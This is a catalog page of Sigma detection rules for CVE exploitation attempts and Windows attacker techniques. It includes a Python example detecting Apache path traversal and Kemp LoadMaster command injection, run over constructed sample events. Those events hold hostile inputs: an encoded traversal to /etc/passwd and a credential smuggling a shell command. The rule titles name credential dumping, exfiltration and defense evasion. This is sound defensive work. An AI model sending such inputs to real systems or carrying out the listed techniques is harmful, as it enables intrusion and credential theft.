  • Potential CVE-2023-25157 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer
cve.2023_25717 1
Show Rules (1)
  • Potential CVE-2023-25717 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25717, a remote code execution via an unauthenticated HTTP GET request in Ruckus Wireless Admin
cve.2023_27363 1
Show Rules (1)
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader - Level: high
    Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
cve.2023_27997 1
Show Rules (1)
  • Potential CVE-2023-27997 Exploitation Indicators - Level: medium
    Description: Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate web logs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as unusual values of the "enc" parameter
cve.2024_1212 1
Show Rules (1)
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection - Level: high
    Description: Detects potential exploitation of CVE-2024-1212, an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to the '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value containing an uncommon character.
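Two of the web-log rules in this list describe their logic precisely enough to reproduce: the Apache 2.4.49 path normalization flaw (CVE-2021-41773, listed earlier under cve.2021_41773) and the Kemp LoadMaster API command injection (CVE-2024-1212, directly above). The following is an added example, not code from the SigmaTACT report or the Sigma project, that implements both as field-level checks in Python and runs them over constructed sample events. Field names follow the Sigma webserver/proxy log source convention (cs-method, c-uri, cs-uri-query); the Authorization field is an assumption, since a combined-format access log carries no request headers and only a proxy or WAF log would. Which "uncommon character" the Kemp rule means is not stated on this page; treating shell metacharacters in the decoded Basic credential as the signal is this example's own choice.

```python
import base64
import binascii
import re
from urllib.parse import unquote


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so a doubly
    encoded %252e is seen as '.' just as %2e is."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


TRAVERSAL = re.compile(r"(^|/)\.\./")


def is_cve_2021_41773(event: dict) -> bool:
    """Apache 2.4.49 ran its '../' check before decoding, so '.%2e/' passed
    the check and was decoded into a traversal afterwards. A literal '../' is
    rejected by every version, so only URIs carrying a percent-encoded dot
    that decode to a traversal are flagged."""
    uri = event.get("c-uri", "")
    return "%2e" in uri.lower() and TRAVERSAL.search(fully_decode(uri)) is not None


# Assumption of this example: the injected payload needs shell metacharacters
# inside the Basic credential, so those are what "uncommon character" means here.
SHELL_META = set("'\";`$|&<>")


def is_cve_2024_1212(event: dict) -> bool:
    """GET /access/set?param=enableapi&value=1 with a Basic credential whose
    decoded form contains shell metacharacters (or is not valid base64)."""
    if event.get("cs-method") != "GET" or "/access/set" not in event.get("c-uri", ""):
        return False
    query = event.get("cs-uri-query", "")
    if "param=enableapi" not in query or "value=1" not in query:
        return False
    auth = event.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        creds = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return True  # not valid base64 at all: uncommon for a real client
    return any(ch in SHELL_META for ch in creds)


RULES = (("CVE-2021-41773", is_cve_2021_41773), ("CVE-2024-1212", is_cve_2024_1212))


def scan(events):
    """Return (event index, rule name) for every event a rule matches."""
    return [(i, name) for i, ev in enumerate(events) for name, check in RULES if check(ev)]


# Constructed sample events, not captured traffic.
EVENTS = [
    {"cs-method": "GET", "c-uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd", "cs-uri-query": ""},
    {"cs-method": "GET", "c-uri": "/icons/apache_pb.gif", "cs-uri-query": ""},
    {"cs-method": "GET", "c-uri": "/access/set", "cs-uri-query": "param=enableapi&value=1",
     "Authorization": "Basic " + base64.b64encode(b"';id;':x").decode()},
    {"cs-method": "GET", "c-uri": "/access/set", "cs-uri-query": "param=enableapi&value=1",
     "Authorization": "Basic " + base64.b64encode(b"admin:correct-horse").decode()},
]

if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(f"event {idx}: {rule} -> {EVENTS[idx]['c-uri']}")
```

The fourth event, an administrator legitimately enabling the API with an ordinary credential, is deliberately left unflagged: matching only on the URI and query string would alert on every use of that endpoint, which is why the rule also inspects the credential.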
cve.2024_3094 1
Show Rules (1)
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process - Level: high
    Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
cve.2024_49113 1
Show Rules (1)
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare - Level: high
    Description: Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
car.2016_04_004 1
Show Rules (1)
  • Potential Pass the Hash Activity - Level: medium
    Description: Detects the attack technique pass the hash which is used to move laterally inside the network
car.2013_04_002 1
Show Rules (1)
  • Quick Execution of a Series of Suspicious Commands - Level: low
    Description: Detects multiple suspicious processes in a limited timeframe

Top Log Source Categories

Log Source Category    Count    Rule Title    Count Bar
windows-process_creation 1387
Show Rules (1387)
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • APT29
  • CrackMapExecWin
  • GALLIUM Artefacts
  • Suspicious Certutil Command Usage
  • Hurricane Panda Activity
  • Lazarus Activity Apr21
  • Lazarus Loaders
  • DNS Tunnel Technique from MuddyWater
  • TA505 Dropper Load Pattern
  • Read and Execute a File Via Cmd.exe
  • Cmd Stream Redirection
  • Credential Acquisition via Registry Hive Dumping
  • Visual Basic Script Execution
  • Execution via MSSQL Xp_cmdshell Stored Procedure
  • Indirect Command Execution via Forfiles
  • Indirect Command Execution
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Rundll32
  • New Lolbin Process by Office Applications
  • Monitoring Wuauclt.exe For Lolbas Execution Of DLL
  • Abusing Findstr for Defense Evasion
  • Suspicious File Download Using Office Application
  • Execute MSDT.EXE Using Diagcab File
  • Ryuk Ransomware Command Line Activity
  • MavInject Process Injection
  • Process Memory Dumped Via RdrLeakDiag.EXE
  • Trickbot Malware Reconnaissance Activity
  • New Service Creation
  • Nslookup PwSh Download Cradle
  • Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
  • Excel Proxy Executing Regsvr32 With Payload
  • Excel Proxy Executing Regsvr32 With Payload Alternate
  • Office Applications Spawning Wmi Cli Alternate
  • Possible Applocker Bypass
  • PowerShell AMSI Bypass Pattern
  • Base64 Encoded Listing of Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets
  • Potential PowerShell Base64 Encoded Shellcode
  • Suspicious Bitsadmin Job via PowerShell
  • Stop Or Remove Antivirus Service
  • Potential Xor Encoded PowerShell Command
  • Regsvr32 Anomaly
  • Registry Dump of SAM Creds and Secrets
  • Renamed PaExec Execution
  • Renamed PsExec
  • Renamed PowerShell
  • Renamed Rundll32.exe Execution
  • Root Certificate Installed
  • Rundll32 JS RunHTMLApplication Pattern
  • Suspicious Rundll32 Script in CommandLine
  • Run from a Zip File
  • Suspicious Add Scheduled Task From User AppData Temp
  • Suspicious Execution of Sc to Delete AV Services
  • Stop Windows Service
  • Suspicious Bitstransfer via PowerShell
  • Suspicious Cmd Execution via WMI
  • Suspicious Characters in CommandLine
  • Wscript Execution from Non C Drive
  • Process Start From Suspicious Folder
  • Squirrel Lolbin
  • PsExec Tool Execution
  • PsExec Service Start
  • Run Whoami as SYSTEM
  • Winword.exe Loads Suspicious DLL
  • WMI Execution Via Office Process
  • WMI Remote Command Execution
  • WMI Reconnaissance List Remote Services
  • Windows Update Client LOLBIN
  • RClone Execution
  • Domain Trust Discovery
  • Suspicious Esentutl Use
  • Rclone Execution via Command Line or PowerShell
  • Activity Related to NTDS.dit Domain Hash Retrieval
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP
  • 7Zip Compressing Dump Files
  • Potential DLL Injection Via AccCheckConsole
  • Suspicious AddinUtil.EXE CommandLine Execution
  • Uncommon Child Process Of AddinUtil.EXE
  • Uncommon AddinUtil.EXE CommandLine Execution
  • AddinUtil.EXE Execution From Uncommon Directory
  • Potential Adplus.EXE Abuse
  • AgentExecutor PowerShell Execution
  • Suspicious AgentExecutor PowerShell Execution
  • Uncommon Child Process Of Appvlp.EXE
  • AspNetCompiler Execution
  • Suspicious Child Process of AspNetCompiler
  • Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
  • Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
  • Hiding Files with Attrib.exe
  • Set Suspicious Files as System Files Using Attrib.EXE
  • Interactive AT Job
  • Audit Policy Tampering Via NT Resource Kit Auditpol
  • Audit Policy Tampering Via Auditpol
  • Indirect Inline Command Execution Via Bash.EXE
  • Indirect Command Execution From Script File Via Bash.EXE
  • Boot Configuration Tampering Via Bcdedit.EXE
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
  • Data Export From MSSQL Table Via BCP.EXE
  • Suspicious Child Process Of BgInfo.EXE
  • BitLockerTogo.EXE Execution
  • Uncommon Child Process Of BgInfo.EXE
  • Suspicious Download From Direct IP Via Bitsadmin
  • File Download Via Bitsadmin
  • Suspicious Download From File-Sharing Website Via Bitsadmin
  • File With Suspicious Extension Downloaded Via Bitsadmin
  • File Download Via Bitsadmin To A Suspicious Target Folder
  • File Download Via Bitsadmin To An Uncommon Target Folder
  • Monitoring For Persistence Via BITS
  • Potential Data Stealing Via Chromium Headless Debugging
  • Browser Execution In Headless Mode
  • File Download with Headless Browser
  • Chromium Browser Instance Executed With Custom Extension
  • Chromium Browser Headless Execution To Mockbin Like Site
  • Suspicious Chromium Browser Instance Executed With Custom Extension
  • File Download From Browser Process Via Inline URL
  • Browser Started with Remote Debugging
  • Tor Client/Browser Execution
  • Suspicious Calculator Usage
  • Potential Binary Proxy Execution Via Cdb.EXE
  • New Root Certificate Installed Via CertMgr.EXE
  • File Download via CertOC.EXE
  • File Download From IP Based URL Via CertOC.EXE
  • DLL Loaded via CertOC.EXE
  • Suspicious DLL Loaded via CertOC.EXE
  • New Root Certificate Installed Via Certutil.EXE
  • File Decoded From Base64/Hex Via Certutil.EXE
  • Suspicious Download Via Certutil.EXE
  • Suspicious File Downloaded From Direct IP Via Certutil.EXE
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
  • File Encoded To Base64 Via Certutil.EXE
  • Potential NTLM Coercion Via Certutil.EXE
  • Suspicious File Encoded To Base64 Via Certutil.EXE
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE
  • Certificate Exported Via Certutil.EXE
  • Suspicious CodePage Switch Via CHCP
  • Console CodePage Lookup Via CHCP
  • Deleted Data Overwritten Via Cipher.EXE
  • Process Access via TrolleyExpress Exclusion
  • Data Copied To Clipboard Via Clip.EXE
  • Cloudflared Portable Execution
  • Cloudflared Quick Tunnel Execution
  • Cloudflared Tunnel Connections Cleanup
  • Cloudflared Tunnel Execution
  • New Generic Credentials Added Via Cmdkey.EXE
  • Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
  • Change Default File Association Via Assoc
  • Potential Arbitrary File Download Via Cmdl32.EXE
  • Change Default File Association To Executable Via Assoc
  • Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
  • Curl Download And Execute Combination
  • File Deletion Via Del
  • Greedy File Deletion Using Del
  • File And SubFolder Enumeration Via Dir Command
  • Potential Dosfuscation Activity
  • Command Line Execution with Suspicious URL and AppData Strings
  • Potential Privilege Escalation Using Symlink Between Osk and Cmd
  • VolumeShadowCopy Symlink Creation Via Mklink
  • Suspicious File Execution From Internet Hosted WebDav Share
  • Cmd.EXE Missing Space Characters Execution Anomaly
  • Potential CommandLine Path Traversal Via Cmd.EXE
  • NtdllPipe Like Activity Execution
  • Potentially Suspicious Ping/Copy Command Combination
  • Suspicious Ping/Del Command Combination
  • Potentially Suspicious CMD Shell Output Redirect
  • Directory Removal Via Rmdir
  • Copy From VolumeShadowCopy Via Cmd.EXE
  • Read Contents From Stdin Via Cmd.EXE
  • Persistence Via Sticky Key Backdoor
  • Sticky Key Like Backdoor Execution
  • Potential Download/Upload Activity Using Type Command
  • Unusual Parent Process For Cmd.EXE
  • CMSTP Execution Process Creation
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE
  • Powershell Executed From Headless ConHost Process
  • Suspicious High IntegrityLevel Conhost Legacy Option
  • Conhost.exe CommandLine Path Traversal
  • Uncommon Child Process Of Conhost.EXE
  • Conhost Spawned By Uncommon Parent Process
  • Control Panel Items
  • CreateDump Process Dump
  • Dynamic .NET Compilation Via Csc.EXE
  • Csc.EXE Execution From Potentially Suspicious Parent
  • Suspicious Csi.exe Usage
  • Suspicious Use of CSharp Interactive Console
  • Active Directory Structure Export Via Csvde.EXE
  • Potential Cookies Session Hijacking
  • Curl Web Request With Potential Custom User-Agent
  • File Download From IP URL Via Curl.EXE
  • Suspicious File Download From IP Via Curl.EXE
  • Suspicious File Download From File Sharing Domain Via Curl.EXE
  • Insecure Transfer Via Curl.EXE
  • Insecure Proxy/DOH Transfer Via Curl.EXE
  • Suspicious Curl.EXE Download
  • Local File Read Using Curl.EXE
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
  • Uncommon Child Process Of Defaultpack.EXE
  • Remote File Download Via Desktopimgdownldr Utility
  • Suspicious Desktopimgdownldr Command
  • Potential DLL Sideloading Via DeviceEnroller.EXE
  • Potentially Suspicious Child Process Of ClickOnce Application
  • Arbitrary MSI Download Via Devinit.EXE
  • DirLister Execution
  • PowerShell Web Access Feature Enabled Via DISM
  • Potentially Suspicious Child Process Of DiskShadow.EXE
  • Diskshadow Script Mode - Uncommon Script Extension Execution
  • Diskshadow Script Mode - Execution From Potential Suspicious Location
  • Dism Remove Online Package
  • Dllhost.EXE Execution Anomaly
  • DLL Sideloading by VMware Xfer Utility
  • Potential Discovery Activity Via Dnscmd.EXE
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
  • DNS Exfiltration and Tunneling Tools Execution
  • Unusual Child Process of dns.exe
  • Potential Application Whitelisting Bypass via Dnx.EXE
  • Process Memory Dump Via Dotnet-Dump
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
  • Binary Proxy Execution Via Dotnet-Trace.EXE
  • Potential Recon Activity Using DriverQuery.EXE
  • DriverQuery.EXE Execution
  • Potentially Over Permissive Permissions Granted Using Dsacls.EXE
  • Potential Password Spraying Attempt Using Dsacls.EXE
  • Domain Trust Discovery Via Dsquery
  • Suspicious Kernel Dump Using Dtrace
  • Potential Windows Defender AV Bypass Via Dump64.EXE Rename
  • DumpMinitool Execution
  • Suspicious DumpMinitool Execution
  • New Capture Session Launched Via DXCap.EXE
  • Esentutl Gather Credentials
  • Copying Sensitive Files with Credential Data
  • Esentutl Steals Browser Information
  • Potentially Suspicious Event Viewer Child Process
  • Potentially Suspicious Cabinet File Expansion
  • Explorer Process Tree Break
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
  • Explorer NOUACCHECK Flag
  • Remote File Download Via Findstr.EXE
  • Findstr GPP Passwords
  • Findstr Launching .lnk File
  • LSASS Process Reconnaissance Via Findstr.EXE
  • Recon Command Output Piped To Findstr.EXE
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE
  • Security Tools Keyword Lookup Via Findstr.EXE
  • Insensitive Subfolder Search Via Findstr.EXE
  • Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
  • Finger.EXE Execution
  • Filter Driver Unloaded Via Fltmc.EXE
  • Sysmon Driver Unloaded Via Fltmc.EXE
  • Forfiles.EXE Child Process Masquerading
  • Forfiles Command Execution
  • Uncommon FileSystem Load Attempt By Format.com
  • Use of FSharp Interpreters
  • Fsutil Drive Enumeration
  • Fsutil Behavior Set SymlinkEvaluation
  • Fsutil Suspicious Invocation
  • Potential Arbitrary Command Execution Via FTP.EXE
  • Arbitrary File Download Via GfxDownloadWrapper.EXE
  • Suspicious Git Clone
  • Potentially Suspicious GoogleUpdate Child Process
  • File Decryption Using Gpg4win
  • File Encryption Using Gpg4win
  • Portable Gpg.EXE Execution
  • File Encryption/Decryption Via Gpg4win From Suspicious Locations
  • Arbitrary Binary Execution Using GUP Utility
  • Gpresult Display Group Policy Information
  • File Download Using Notepad++ GUP Utility
  • Suspicious GUP Usage
  • HH.EXE Execution
  • Remote CHM File Download/Execution Via HH.EXE
  • HTML Help HH.EXE Suspicious Child Process
  • Suspicious HH.EXE Execution
  • HackTool - ADCSPwn Execution
  • HackTool - Bloodhound/Sharphound Execution
  • HackTool - F-Secure C3 Load by Rundll32
  • HackTool - Certify Execution
  • HackTool - Certipy Execution
  • Operator Bloopers Cobalt Strike Commands
  • Operator Bloopers Cobalt Strike Modules
  • CobaltStrike Load by Rundll32
  • Potential CobaltStrike Process Patterns
  • HackTool - CoercedPotato Execution
  • HackTool - Covenant PowerShell Launcher
  • HackTool - CrackMapExec Execution
  • HackTool - CrackMapExec Execution Patterns
  • HackTool - CrackMapExec Process Patterns
  • HackTool - CrackMapExec PowerShell Obfuscation
  • HackTool - CreateMiniDump Execution
  • HackTool - DInjector PowerShell Cradle Execution
  • HackTool - Dumpert Process Dumper Execution
  • HackTool - EDRSilencer Execution
  • HackTool - Empire PowerShell Launch Parameters
  • HackTool - Empire PowerShell UAC Bypass
  • Hacktool Execution - Imphash
  • HackTool - WinRM Access Via Evil-WinRM
  • Hacktool Execution - PE Metadata
  • HackTool - GMER Rootkit Detector and Remover Execution
  • HackTool - HandleKatz LSASS Dumper Execution
  • HackTool - Hashcat Password Cracker Execution
  • HackTool - Htran/NATBypass Execution
  • HackTool - Hydra Password Bruteforce Execution
  • HackTool - Potential Impacket Lateral Movement Activity
  • HackTool - Impacket Tools Execution
  • HackTool - Impersonate Execution
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • HackTool - Inveigh Execution
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • HackTool - Jlaive In-Memory Assembly Execution
  • HackTool - Koadic Execution
  • HackTool - KrbRelay Execution
  • HackTool - KrbRelayUp Execution
  • HackTool - RemoteKrbRelay Execution
  • HackTool - LaZagne Execution
  • HackTool - LocalPotato Execution
  • Potential Meterpreter/CobaltStrike Activity
  • HackTool - Mimikatz Execution
  • HackTool - PCHunter Execution
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation
  • HackTool - PowerTool Execution
  • HackTool - Pypykatz Credentials Dumping Activity
  • HackTool - PurpleSharp Execution
  • HackTool - Quarks PwDump Execution
  • HackTool - RedMimicry Winnti Playbook Execution
  • Potential SMB Relay Attack Tool Execution
  • HackTool - Rubeus Execution
  • HackTool - SafetyKatz Execution
  • HackTool - SecurityXploded Execution
  • HackTool - PPID Spoofing SelectMyParent Tool Execution
  • HackTool - SharPersist Execution
  • HackTool - SharpEvtMute Execution
  • HackTool - SharpLdapWhoami Execution
  • HackTool - SharpMove Tool Execution
  • HackTool - SharpUp PrivEsc Tool Execution
  • HackTool - SharpView Execution
  • HackTool - SharpWSUS/WSUSpendu Execution
  • HackTool - SharpChisel Execution
  • HackTool - SharpImpersonation Execution
  • HackTool - SharpDPAPI Execution
  • HackTool - SharpLDAPmonitor Execution
  • HackTool - SILENTTRINITY Stager Execution
  • HackTool - Sliver C2 Implant Activity Pattern
  • HackTool - SOAPHound Execution
  • HackTool - Stracciatella Execution
  • HackTool - SysmonEOP Execution
  • HackTool - TruffleSnout Execution
  • HackTool - UACMe Akagi Execution
  • HackTool - Windows Credential Editor (WCE) Execution
  • HackTool - winPEAS Execution
  • HackTool - WinPwn Execution
  • HackTool - Wmiexec Default Powershell Command
  • HackTool - XORDump Execution
  • Suspicious ZipExec Execution
  • Suspicious Execution of Hostname
  • Suspicious HWP Sub Processes
  • Potential Fake Instance Of Hxtsr.EXE Executed
  • Use Icacls to Hide File to Everyone
  • File Download And Execution Via IEExec.EXE
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
  • Disable Windows IIS HTTP Logging
  • Microsoft IIS Service Account Password Dumped
  • IIS Native-Code Module Command Line Installation
  • Suspicious IIS URL GlobalRules Rewrite Via AppCmd
  • Microsoft IIS Connection Strings Decryption
  • Suspicious IIS Module Registration
  • C# IL Code Compilation Via Ilasm.EXE
  • ImagingDevices Unusual Parent/Child Processes
  • Arbitrary File Download Via IMEWDBLD.EXE
  • InfDefaultInstall.exe .inf Execution
  • File Download Via InstallUtil.EXE
  • Suspicious Execution of InstallUtil Without Log
  • Suspicious Shells Spawn by Java Utility Keytool
  • Suspicious Child Process Of Manage Engine ServiceDesk
  • Java Running with Remote Debugging
  • Suspicious Processes Spawned by Java.EXE
  • Shell Process Spawned by Java.EXE
  • Suspicious SysAidServer Child
  • JScript Compiler Execution
  • Kavremover Dropped Binary LOLBIN Usage
  • Windows Kernel Debugger Execution
  • Computer Password Change Via Ksetup.EXE
  • Potentially Suspicious Child Process of KeyScrambler.exe
  • Active Directory Structure Export Via Ldifde.EXE
  • Logged-On User Password Change Via Ksetup.EXE
  • Import LDAP Data Interchange Format File Via Ldifde.EXE
  • Uncommon Link.EXE Parent Process
  • Rebuild Performance Counter Values Via Lodctr.EXE
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
  • Suspicious CustomShellHost Execution
  • LOLBAS Data Exfiltration by DataSvcUtil.exe
  • Devtoolslauncher.exe Executes Specified Binary
  • DeviceCredentialDeployment Execution
  • Suspicious Diantz Alternate Data Stream Execution
  • Suspicious Diantz Download and Compress Into a CAB File
  • Suspicious Extrac32 Execution
  • Suspicious Extrac32 Alternate Data Stream Execution
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Gpscript Execution
  • Ie4uinit Lolbin Use From Invalid Path
  • Launch-VsDevShell.PS1 Proxy Execution
  • Potential Manage-bde.wsf Abuse To Proxy Execution
  • Mavinject Inject DLL Into Running Process
  • MpiExec Lolbin
  • Execute Files with Msdeploy.exe
  • Execute MSDT Via Answer File
  • Use of OpenConsole
  • OpenWith.exe Executes Specified Binary
  • Use of Pcalua For Execution
  • Indirect Command Execution By Program Compatibility Wizard
  • Execute Pcwrun.EXE To Leverage Follina
  • Code Execution via Pcwutl.dll
  • Execute Code with Pester.bat as Parent
  • Execute Code with Pester.bat
  • PrintBrm ZIP Creation of Extraction
  • Pubprn.vbs Proxy Execution
  • DLL Execution via Rasautou.exe
  • REGISTER_APP.VBS Proxy Execution
  • Use of Remote.exe
  • Replace.exe Usage
  • Lolbin Runexehelper Use As Proxy
  • Suspicious Runscripthelper.exe
  • Use of Scriptrunner.exe
  • Using SettingSyncHost.exe as LOLBin
  • Use Of The SFTP.EXE Binary As A LOLBIN
  • Suspicious Certreq Command to Download
  • Suspicious Driver Install by pnputil.exe
  • Suspicious GrpConv Execution
  • Dumping Process via Sqldumper.exe
  • SyncAppvPublishingServer Execute Arbitrary PowerShell Code
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
  • Potential DLL Injection Or Execution Using Tracker.exe
  • Use of TTDInject.exe
  • Time Travel Debugging Utility Usage
  • Lolbin Unregmp2.exe Use As Proxy
  • UtilityFunctions.ps1 Proxy Dll
  • Use of VisualUiaVerifyNative.exe
  • Visual Basic Command Line Compiler Usage
  • Use of VSIISExeLauncher.exe
  • Use of Wfc.exe
  • Potential Register_App.Vbs LOLScript Abuse
  • Potential Credential Dumping Via LSASS Process Clone
  • Potential Mftrace.EXE Abuse
  • MMC20 Lateral Movement
  • MMC Spawning Windows Shell
  • CodePage Modification Via MODE.COM To Russian Language
  • Potential Suspicious Mofcomp Execution
  • Potential Mpclient.DLL Sideloading Via Defender Binaries
  • File Download Via Windows Defender MpCmpRun.EXE
  • Suspicious Msbuild Execution By Uncommon Parent Process
  • Windows Defender Definition Files Removed
  • Potential Arbitrary Command Execution Using Msdt.EXE
  • Suspicious Cabinet File Execution Via Msdt.EXE
  • Arbitrary File Download Via MSEDGE_PROXY.EXE
  • Suspicious MSDT Parent Process
  • Remotely Hosted HTA File Executed Via Mshta.EXE
  • Wscript Shell Run In CommandLine
  • Suspicious JavaScript Execution Via Mshta.EXE
  • Potential LethalHTA Technique Execution
  • Suspicious MSHTA Child Process
  • MSHTA Suspicious Execution 01
  • Suspicious Mshta.EXE Execution Patterns
  • DllUnregisterServer Function Call Via Msiexec.EXE
  • Suspicious MsiExec Embedding Parent
  • Suspicious Msiexec Execute Arbitrary DLL
  • Msiexec Quiet Installation
  • Suspicious Msiexec Quiet Install From Remote Location
  • Potential MsiExec Masquerading
  • MsiExec Web Install
  • Arbitrary File Download Via MSOHTMED.EXE
  • Arbitrary File Download Via MSPUB.EXE
  • Potential Process Injection Via Msra.EXE
  • Detection of PowerShell Execution via Sqlps.exe
  • SQL Client Tools PowerShell Session Detection
  • Suspicious Child Process Of SQL Server
  • Suspicious Child Process Of Veeam Database
  • Potential MSTSC Shadowing Activity
  • New Remote Desktop Connection Initiated Via Mstsc.EXE
  • Mstsc.EXE Execution With Local RDP File
  • Suspicious Mstsc.EXE Execution With Local RDP File
  • Mstsc.EXE Execution From Uncommon Parent
  • Msxsl.EXE Execution
  • Remote XSL Execution Via Msxsl.EXE
  • New Firewall Rule Added Via Netsh.EXE
  • Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
  • RDP Connection Allowed Via Netsh.EXE
  • Firewall Rule Deleted Via Netsh.EXE
  • Firewall Disabled via Netsh.EXE
  • Netsh Allow Group Policy on Microsoft Defender Firewall
  • Firewall Configuration Discovery Via Netsh.EXE
  • Firewall Rule Update Via Netsh.EXE
  • Potential Persistence Via Netsh Helper DLL
  • New Network Trace Capture Started Via Netsh.EXE
  • New Port Forwarding Rule Added Via Netsh.EXE
  • RDP Port Forwarding Rule Added Via Netsh.EXE
  • Harvesting Of Wifi Credentials Via Netsh.EXE
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE
  • Unmount Share Via Net.EXE
  • Start Windows Service Via Net.EXE
  • New User Created Via Net.EXE
  • New User Created Via Net.EXE With Never Expire Option
  • Suspicious Manipulation Of Default Accounts Via Net.EXE
  • Windows Admin Share Mount Via Net.EXE
  • Stop Windows Service Via Net.EXE
  • Password Provided In Command Line Of Net.EXE
  • Windows Internet Hosted WebDav Share Mount Via Net.EXE
  • Windows Share Mount Via Net.EXE
  • System Network Connections Discovery Via Net.EXE
  • Share And Session Enumeration Using Net.EXE
  • Nltest.EXE Execution
  • Potential Arbitrary Code Execution Via Node.EXE
  • Potential Recon Activity Via Nltest.EXE
  • Node Process Executions
  • Network Reconnaissance Activity
  • Nslookup PowerShell Download Cradle - ProcessCreation
  • Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Driver/DLL Installation Via Odbcconf.EXE
  • Suspicious Driver/DLL Installation Via Odbcconf.EXE
  • New DLL Registered Via Odbcconf.EXE
  • Odbcconf.EXE Suspicious DLL Location
  • Potentially Suspicious DLL Registered Via Odbcconf.EXE
  • Response File Execution Via Odbcconf.EXE
  • Suspicious Response File Execution Via Odbcconf.EXE
  • Uncommon Child Process Spawned By Odbcconf.EXE
  • Potential Arbitrary File Download Using Office Application
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
  • Potentially Suspicious Office Document Executed From Trusted Location
  • OneNote.EXE Execution of Malicious Embedded Scripts
  • Suspicious Microsoft OneNote Child Process
  • Outlook EnableUnsafeClientMailRules Setting Enabled
  • Suspicious Execution From Outlook Temporary Folder
  • Suspicious Outlook Child Process
  • Suspicious Remote Child Process From Outlook
  • Suspicious Binary In User Directory Spawned From Office Application
  • Potential Arbitrary DLL Load Using Winword
  • Suspicious Microsoft Office Child Process
  • Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
  • PDQ Deploy Remote Administration Tool Execution
  • Potentially Suspicious Execution Of PDQDeployRunner
  • Perl Inline Command Execution
  • Php Inline Command Execution
  • Ping Hex IP
  • PktMon.EXE Execution
  • Suspicious Plink Port Forwarding
  • Potential RDP Tunneling Via Plink
  • Suspicious Powercfg Execution To Change Lock Screen Timeout
  • AADInternals PowerShell Cmdlets Execution - ProcessCreation
  • Potential Active Directory Enumeration Using AD Module - ProcCreation
  • Add Windows Capability Via PowerShell Cmdlet
  • Potential AMSI Bypass Via .NET Reflection
  • Potential AMSI Bypass Using NULL Bits
  • Audio Capture via PowerShell
  • Suspicious Encoded PowerShell Command Line
  • Suspicious PowerShell Encoded Command Patterns
  • Suspicious Obfuscated PowerShell Code
  • PowerShell Base64 Encoded FromBase64String Cmdlet
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines
  • PowerShell Base64 Encoded IEX Cmdlet
  • PowerShell Base64 Encoded Invoke Keyword
  • Powershell Base64 Encoded MpPreference Cmdlet
  • PowerShell Base64 Encoded Reflective Assembly Load
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
  • Potential Process Execution Proxy Via CL_Invocation.ps1
  • PowerShell Base64 Encoded WMI Classes
  • Assembly Loading Via CL_LoadAssembly.ps1
  • Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
  • Potential PowerShell Obfuscation Via Reversed Commands
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine
